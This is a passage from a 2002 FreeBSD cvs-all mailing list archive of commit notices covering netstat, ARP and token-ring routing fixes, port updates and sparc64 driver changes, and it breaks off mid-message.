X-FreeBSD-CVS-Branch: RELENG_4 Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG kbyanc 2002/06/17 17:10:09 PDT Modified files: (Branch: RELENG_4) usr.bin/netstat route.c Log: MFC 1.66: Use calculated column widths for the routing table display when -W is supplied rather than arbitrarily larger widths. Sponsored by: NTT Multimedia Communications Labs Revision Changes Path 1.41.2.13 +208 -55 src/usr.bin/netstat/route.c To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Mon Jun 17 17:15:39 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 65F1437B420; Mon, 17 Jun 2002 17:15:32 -0700 (PDT) Received: (from kbyanc@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5I0FV070856; Mon, 17 Jun 2002 17:15:31 -0700 (PDT) (envelope-from kbyanc) Message-Id: <200206180015.g5I0FV070856@freefall.freebsd.org> From: Kelly Yancey Date: Mon, 17 Jun 2002 17:15:31 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/sys/netinet if_ether.c src/sys/net if_iso88025subr.c iso88025.h X-FreeBSD-CVS-Branch: RELENG_4 Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG kbyanc 2002/06/17 17:15:31 PDT Modified files: (Branch: RELENG_4) sys/netinet if_ether.c sys/net if_iso88025subr.c iso88025.h Log: MFC netinet/if_ether.c:1.93-1.94, net/if_iso88025subr.c:1.21, net/iso88025.h:1.6-1.8: Move ISO88025 source routing information into sockaddr_dl's sdl_data field. This returns the sdl_data field to a variable-length field. More importantly, this prevents a easily-reproduceable data-corruption bug when the interface name plus the hardware address exceed the sdl_data field's original 12 byte limit. However, token-ring interfaces may still overflow the new sdl_data field's 46 byte limit if the interface name exceeds 6 characters (since 6 characters for interface name plus 6 for hardware address plus 34 for source routing = the size of sdl_data). Sponsored by: NTT Multimedia Communications Labs Revision Changes Path 1.7.2.7 +2 -2 src/sys/net/if_iso88025subr.c 1.3.2.2 +12 -1 src/sys/net/iso88025.h 1.64.2.19 +8 -8 src/sys/netinet/if_ether.c To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Mon Jun 17 17:17: 4 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 4578337B41C; Mon, 17 Jun 2002 17:16:59 -0700 (PDT) Received: (from kbyanc@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5I0GxJ71001; Mon, 17 Jun 2002 17:16:59 -0700 (PDT) (envelope-from kbyanc) Message-Id: <200206180016.g5I0GxJ71001@freefall.freebsd.org> From: Kelly Yancey Date: Mon, 17 Jun 2002 17:16:59 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/usr.sbin/arp arp.c X-FreeBSD-CVS-Branch: RELENG_4 Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG kbyanc 2002/06/17 17:16:59 PDT Modified files: (Branch: RELENG_4) usr.sbin/arp arp.c Log: MFC 1.39-1.40: Update ARP to access token-ring source routing information at it's new location. Sponsored by: NTT Multimedia Communications Labs Revision Changes Path 1.22.2.10 +10 -5 src/usr.sbin/arp/arp.c To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Mon Jun 17 17:18:44 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 35BE737B436; Mon, 17 Jun 2002 17:18:33 -0700 (PDT) Received: (from kbyanc@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5I0IXH71107; Mon, 17 Jun 2002 17:18:33 -0700 (PDT) (envelope-from kbyanc) Message-Id: <200206180018.g5I0IXH71107@freefall.freebsd.org> From: Kelly Yancey Date: Mon, 17 Jun 2002 17:18:33 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/usr.sbin/rarpd rarpd.c X-FreeBSD-CVS-Branch: RELENG_4 Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG kbyanc 2002/06/17 17:18:33 PDT Modified files: (Branch: RELENG_4) usr.sbin/rarpd rarpd.c Log: MFC 1.32: Teach rarpd about sockaddr_dl's new layout. Revision Changes Path 1.23.2.3 +1 -1 src/usr.sbin/rarpd/rarpd.c To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Mon Jun 17 17:23:49 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id D69E337B438; Mon, 17 Jun 2002 17:23:37 -0700 (PDT) Received: (from jim@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5I0Nb871830; Mon, 17 Jun 2002 17:23:37 -0700 (PDT) (envelope-from jim) Message-Id: <200206180023.g5I0Nb871830@freefall.freebsd.org> From: Jim Mock Date: Mon, 17 Jun 2002 17:23:37 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/irc/xchat-devel Makefile X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG jim 2002/06/17 17:23:37 PDT Modified files: irc/xchat-devel Makefile Log: Change maintainer to gnome@FreeBSD.org. I have a potential upgrade to 1.9.1, but I seem to be having some font issues preventing it from starting up, so until I get those straightened out, only commit the maintainer change for now. Discussed with: marcus Revision Changes Path 1.80 +2 -2 ports/irc/xchat-devel/Makefile To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Mon Jun 17 17:27:32 2002 Delivered-To: cvs-all@freebsd.org Received: from gateway.posi.net (12-236-90-177.client.attbi.com [12.236.90.177]) by hub.freebsd.org (Postfix) with ESMTP id AA74537B426; Mon, 17 Jun 2002 17:27:10 -0700 (PDT) Received: from localhost (localhost [127.0.0.1]) by gateway.posi.net (8.12.3/8.12.3) with ESMTP id g5I0R9M7075328; Mon, 17 Jun 2002 17:27:09 -0700 (PDT) (envelope-from kbyanc@posi.net) Date: Mon, 17 Jun 2002 17:27:09 -0700 (PDT) From: Kelly Yancey To: Kelly Yancey Cc: cvs-committers@FreeBSD.org, Subject: Re: cvs commit: src/sys/netinet if_ether.c src/sys/net if_iso88025subr.c iso88025.h In-Reply-To: <200206180015.g5I0FV070856@freefall.freebsd.org> Message-ID: <20020617172132.R72633-100000@gateway.posi.net> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG On Mon, 17 Jun 2002, Kelly Yancey wrote: > kbyanc 2002/06/17 17:15:31 PDT > > Modified files: (Branch: RELENG_4) > sys/netinet if_ether.c > sys/net if_iso88025subr.c iso88025.h > Log: > MFC netinet/if_ether.c:1.93-1.94, > net/if_iso88025subr.c:1.21, > net/iso88025.h:1.6-1.8: > Move ISO88025 source routing information into sockaddr_dl's > sdl_data field. This returns the sdl_data field to a > variable-length field. More importantly, this prevents a > easily-reproduceable data-corruption bug when the interface name > plus the hardware address exceed the sdl_data field's original 12 > byte limit. However, token-ring interfaces may still overflow the > new sdl_data field's 46 byte limit if the interface name exceeds 6 > characters (since 6 characters for interface name plus 6 for hardware > address plus 34 for source routing = the size of sdl_data). > Maybe now I'll get some feedback for those individuals rumored to own token-ring equipment. Or perhaps almost 2 months of silence is a remarkably good sign that these changes didn't adversely affect them at all. I can hope, can't I? :) Kelly -- Kelly Yancey -- kbyanc@{posi.net,FreeBSD.org} Visit the BSD driver database: http://www.posi.net/freebsd/drivers/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Mon Jun 17 17:33: 1 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 698A137B425; Mon, 17 Jun 2002 17:32:57 -0700 (PDT) Received: (from dwcjr@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5I0Wvr72821; Mon, 17 Jun 2002 17:32:57 -0700 (PDT) (envelope-from dwcjr) Message-Id: <200206180032.g5I0Wvr72821@freefall.freebsd.org> From: "David W. Chapman Jr." Date: Mon, 17 Jun 2002 17:32:57 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/net/samba/files patch-ba X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG dwcjr 2002/06/17 17:32:57 PDT Modified files: net/samba/files patch-ba Log: Fix LDAP linking Noticed by: sroberts@dsl.pipex.com Revision Changes Path 1.8 +12 -3 ports/net/samba/files/patch-ba To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Mon Jun 17 17:41:54 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id C340437B403; Mon, 17 Jun 2002 17:41:47 -0700 (PDT) Received: (from dougb@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5I0fl373672; Mon, 17 Jun 2002 17:41:47 -0700 (PDT) (envelope-from dougb) Message-Id: <200206180041.g5I0fl373672@freefall.freebsd.org> From: Doug Barton Date: Mon, 17 Jun 2002 17:41:47 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/contrib/groff/tmac doc-common groff_mdoc.man src/gnu/usr.bin/groff/tmac mdoc.local X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG dougb 2002/06/17 17:41:47 PDT Modified files: contrib/groff/tmac doc-common groff_mdoc.man gnu/usr.bin/groff/tmac mdoc.local Log: Teach mdoc about the 4.6 release Revision Changes Path 1.53 +1 -0 src/contrib/groff/tmac/doc-common 1.2 +3965 -369 src/contrib/groff/tmac/groff_mdoc.man 1.12 +1 -1 src/gnu/usr.bin/groff/tmac/mdoc.local To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Mon Jun 17 17:51:47 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 467DA37B433; Mon, 17 Jun 2002 17:51:44 -0700 (PDT) Received: (from dougb@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5I0obS74092; Mon, 17 Jun 2002 17:50:37 -0700 (PDT) (envelope-from dougb) Message-Id: <200206180050.g5I0obS74092@freefall.freebsd.org> From: Doug Barton Date: Mon, 17 Jun 2002 17:50:37 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/contrib/groff/tmac doc-common groff_mdoc.man src/gnu/usr.bin/groff/tmac mdoc.local X-FreeBSD-CVS-Branch: RELENG_4 Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG dougb 2002/06/17 17:50:37 PDT Modified files: (Branch: RELENG_4) contrib/groff/tmac doc-common groff_mdoc.man gnu/usr.bin/groff/tmac mdoc.local Log: MFC (more or less) knowledge of the 4.6 release for mdoc's benefit. Also bump default release, spotted by alert user Paul Reece . Revision Changes Path 1.21.2.25 +2 -1 src/contrib/groff/tmac/doc-common 1.1.1.1.4.8 +3 -1 src/contrib/groff/tmac/groff_mdoc.man 1.2.2.12 +2 -2 src/gnu/usr.bin/groff/tmac/mdoc.local To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Mon Jun 17 17:56:32 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id C667737B415; Mon, 17 Jun 2002 17:56:27 -0700 (PDT) Received: (from obrien@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5I0tG376532; Mon, 17 Jun 2002 17:55:16 -0700 (PDT) (envelope-from obrien) Message-Id: <200206180055.g5I0tG376532@freefall.freebsd.org> From: "David E. O'Brien" Date: Mon, 17 Jun 2002 17:55:16 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/mail/p5-Mail-SpamAssassin Makefile X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG obrien 2002/06/17 17:55:16 PDT Modified files: mail/p5-Mail-SpamAssassin Makefile Log: Optimize the install a little. Revision Changes Path 1.18 +4 -4 ports/mail/p5-Mail-SpamAssassin/Makefile To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Mon Jun 17 18:14:22 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id CB16337B435; Mon, 17 Jun 2002 18:14:18 -0700 (PDT) Received: (from obrien@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5I1B5589171; Mon, 17 Jun 2002 18:11:05 -0700 (PDT) (envelope-from obrien) Message-Id: <200206180111.g5I1B5589171@freefall.freebsd.org> From: "David E. O'Brien" Date: Mon, 17 Jun 2002 18:11:04 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/sys/sparc64/conf GENERIC X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG obrien 2002/06/17 18:11:04 PDT Modified files: sys/sparc64/conf GENERIC Log: Sync with i386. Revision Changes Path 1.21 +10 -8 src/sys/sparc64/conf/GENERIC To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Mon Jun 17 18:19:42 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id BDCBC37B43B; Mon, 17 Jun 2002 18:19:38 -0700 (PDT) Received: (from obrien@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5I1Etg89597; Mon, 17 Jun 2002 18:14:55 -0700 (PDT) (envelope-from obrien) Message-Id: <200206180114.g5I1Etg89597@freefall.freebsd.org> From: "David E. O'Brien" Date: Mon, 17 Jun 2002 18:14:55 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/sys/conf files.sparc64 X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG obrien 2002/06/17 18:14:55 PDT Modified files: sys/conf files.sparc64 Log: Allow one to configure `sio'. Revision Changes Path 1.22 +6 -0 src/sys/conf/files.sparc64 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Mon Jun 17 18:34:41 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 6C61D37B426; Mon, 17 Jun 2002 18:34:39 -0700 (PDT) Received: (from obrien@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5I1JVM90001; Mon, 17 Jun 2002 18:19:31 -0700 (PDT) (envelope-from obrien) Message-Id: <200206180119.g5I1JVM90001@freefall.freebsd.org> From: "David E. O'Brien" Date: Mon, 17 Jun 2002 18:19:31 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/sys/dev/sio sio_ebus.c X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG obrien 2002/06/17 18:19:31 PDT Added files: sys/dev/sio sio_ebus.c Log: ebus sio(4) attachment. Submitted by: tmm Revision Changes Path 1.1 +113 -0 src/sys/dev/sio/sio_ebus.c (new) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Mon Jun 17 19: 7:23 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id EC3CE37B401; Mon, 17 Jun 2002 19:07:17 -0700 (PDT) Received: (from alane@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5I27Ht98340; Mon, 17 Jun 2002 19:07:17 -0700 (PDT) (envelope-from alane) Message-Id: <200206180207.g5I27Ht98340@freefall.freebsd.org> From: Alan Eldridge Date: Mon, 17 Jun 2002 19:07:17 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/net/samba Makefile pkg-plist X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG alane 2002/06/17 19:07:17 PDT Modified files: net/samba Makefile pkg-plist Log: Fix pkg-plist. Bump PORTREVISION. Done on authority of maintainer. PR: ports/39450 Submitted by: alane Approved by: dwcjr Revision Changes Path 1.89 +6 -2 ports/net/samba/Makefile 1.36 +53 -3 ports/net/samba/pkg-plist To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Mon Jun 17 19:15:16 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 2A46637B403; Mon, 17 Jun 2002 19:15:12 -0700 (PDT) Received: (from jake@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5I2FC299300; Mon, 17 Jun 2002 19:15:12 -0700 (PDT) (envelope-from jake) Message-Id: <200206180215.g5I2FC299300@freefall.freebsd.org> From: Jake Burkholder Date: Mon, 17 Jun 2002 19:15:12 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/lib/libc/sparc64/fpu fpu.c X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG jake 2002/06/17 19:15:12 PDT Modified files: lib/libc/sparc64/fpu fpu.c Log: Remove unneeded include of machine/emul.h. Revision Changes Path 1.7 +0 -1 src/lib/libc/sparc64/fpu/fpu.c To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Mon Jun 17 19:16:12 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 1883137B41F; Mon, 17 Jun 2002 19:16:06 -0700 (PDT) Received: (from dillon@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5I2G6099363; Mon, 17 Jun 2002 19:16:06 -0700 (PDT) (envelope-from dillon) Message-Id: <200206180216.g5I2G6099363@freefall.freebsd.org> From: Matt Dillon Date: Mon, 17 Jun 2002 19:16:06 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/graphics/crw Makefile distinfo X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG dillon 2002/06/17 19:16:06 PDT Modified files: graphics/crw Makefile distinfo Log: Bump to version 1.02. Fix a bunch of bugs related to .ppm output and the Canon G2 base red and blue filter multipliers. Put the white point scaling and the original gamma function back in. Fix the black-and-white output option, it is now much better and can get 10 bits of information into the 8-bit RGB output image by adjusting the red and blue guns by +1 relative to green to handle fractional pixel values. Also added an option -indoor which sets the red filter to 0.7, a rough compensation for indoor lighting. Revision Changes Path 1.2 +1 -1 ports/graphics/crw/Makefile 1.2 +1 -1 ports/graphics/crw/distinfo To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Mon Jun 17 19:36: 7 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 0975F37B40C; Mon, 17 Jun 2002 19:36:04 -0700 (PDT) Received: (from mi@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5I2a3101380; Mon, 17 Jun 2002 19:36:03 -0700 (PDT) (envelope-from mi) Message-Id: <200206180236.g5I2a3101380@freefall.freebsd.org> From: Mikhail Teterin Date: Mon, 17 Jun 2002 19:36:03 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/graphics/jbigkit Makefile distinfo ports/graphics/jbigkit/files patch-aa X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG mi 2002/06/17 19:36:03 PDT Modified files: graphics/jbigkit Makefile distinfo graphics/jbigkit/files patch-aa Log: Update to 1.4 (from 1.2). No API changes listed in the CHANGES -- bug fixes/improvements only, hence no shared library version bump. PR: ports/37275 Submitted by: KATO Tsuguru Revision Changes Path 1.18 +2 -2 ports/graphics/jbigkit/Makefile 1.6 +1 -1 ports/graphics/jbigkit/distinfo 1.10 +29 -8 ports/graphics/jbigkit/files/patch-aa To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Mon Jun 17 19:39:16 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 3572C37B408; Mon, 17 Jun 2002 19:39:13 -0700 (PDT) Received: (from obrien@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5I2dDZ01664; Mon, 17 Jun 2002 19:39:13 -0700 (PDT) (envelope-from obrien) Message-Id: <200206180239.g5I2dDZ01664@freefall.freebsd.org> From: "David E. O'Brien" Date: Mon, 17 Jun 2002 19:39:13 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/sys/dev/puc pucdata.c pucvar.h X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG obrien 2002/06/17 19:39:13 PDT Modified files: sys/dev/puc pucdata.c pucvar.h Log: Support the Comtrol RocketPort 550 PCi 16 (used with RocketPort I/F box). Sponsored by: Feral Software Revision Changes Path 1.7 +28 -0 src/sys/dev/puc/pucdata.c 1.2 +1 -1 src/sys/dev/puc/pucvar.h To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Mon Jun 17 19:46:36 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id E0D0437B41A; Mon, 17 Jun 2002 19:46:31 -0700 (PDT) Received: (from mi@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5I2kVm02670; Mon, 17 Jun 2002 19:46:31 -0700 (PDT) (envelope-from mi) Message-Id: <200206180246.g5I2kVm02670@freefall.freebsd.org> From: Mikhail Teterin Date: Mon, 17 Jun 2002 19:46:31 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/www Makefile ports/www/linbot Makefile distinfo pkg-comment pkg-descr pkg-plist ports/www/linbot/files patch-compat patch-usage X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG mi 2002/06/17 19:46:31 PDT Modified files: www Makefile Removed files: www/linbot Makefile distinfo pkg-comment pkg-descr pkg-plist www/linbot/files patch-compat patch-usage Log: Remove the linbot port. The author stopped development after the company behind linKbot claimed trademark violations. Fortunately, Mike W. Meyer picked it up, and the newly renamed and improved version is now known as www/webcheck. Revision Changes Path 1.508 +0 -1 ports/www/Makefile 1.14 +0 -40 ports/www/linbot/Makefile (dead) 1.4 +0 -1 ports/www/linbot/distinfo (dead) 1.3 +0 -123 ports/www/linbot/files/patch-compat (dead) 1.2 +0 -21 ports/www/linbot/files/patch-usage (dead) 1.3 +0 -1 ports/www/linbot/pkg-comment (dead) 1.4 +0 -9 ports/www/linbot/pkg-descr (dead) 1.7 +0 -33 ports/www/linbot/pkg-plist (dead) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Mon Jun 17 19:50: 0 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id EDAD537B409; Mon, 17 Jun 2002 19:49:55 -0700 (PDT) Received: (from dinoex@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5I2nta02879; Mon, 17 Jun 2002 19:49:55 -0700 (PDT) (envelope-from dinoex) Message-Id: <200206180249.g5I2nta02879@freefall.freebsd.org> From: Dirk Meyer Date: Mon, 17 Jun 2002 19:49:55 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/mail/vbsfilter Makefile distinfo ports/mail/vbsfilter/files patch-vbsfilter.c X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG dinoex 2002/06/17 19:49:55 PDT Modified files: mail/vbsfilter Makefile distinfo mail/vbsfilter/files patch-vbsfilter.c Log: Update to vbsfilter-1.9 Revision Changes Path 1.13 +1 -1 ports/mail/vbsfilter/Makefile 1.4 +1 -1 ports/mail/vbsfilter/distinfo 1.4 +2 -2 ports/mail/vbsfilter/files/patch-vbsfilter.c To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Mon Jun 17 19:50:39 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 5CEB837B423; Mon, 17 Jun 2002 19:50:05 -0700 (PDT) Received: (from obrien@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5I2o5M02943; Mon, 17 Jun 2002 19:50:05 -0700 (PDT) (envelope-from obrien) Message-Id: <200206180250.g5I2o5M02943@freefall.freebsd.org> From: "David E. O'Brien" Date: Mon, 17 Jun 2002 19:50:05 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/sys/dev/puc pucdata.c pucvar.h X-FreeBSD-CVS-Branch: RELENG_4 Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG obrien 2002/06/17 19:50:05 PDT Modified files: (Branch: RELENG_4) sys/dev/puc pucdata.c pucvar.h Log: MFC: 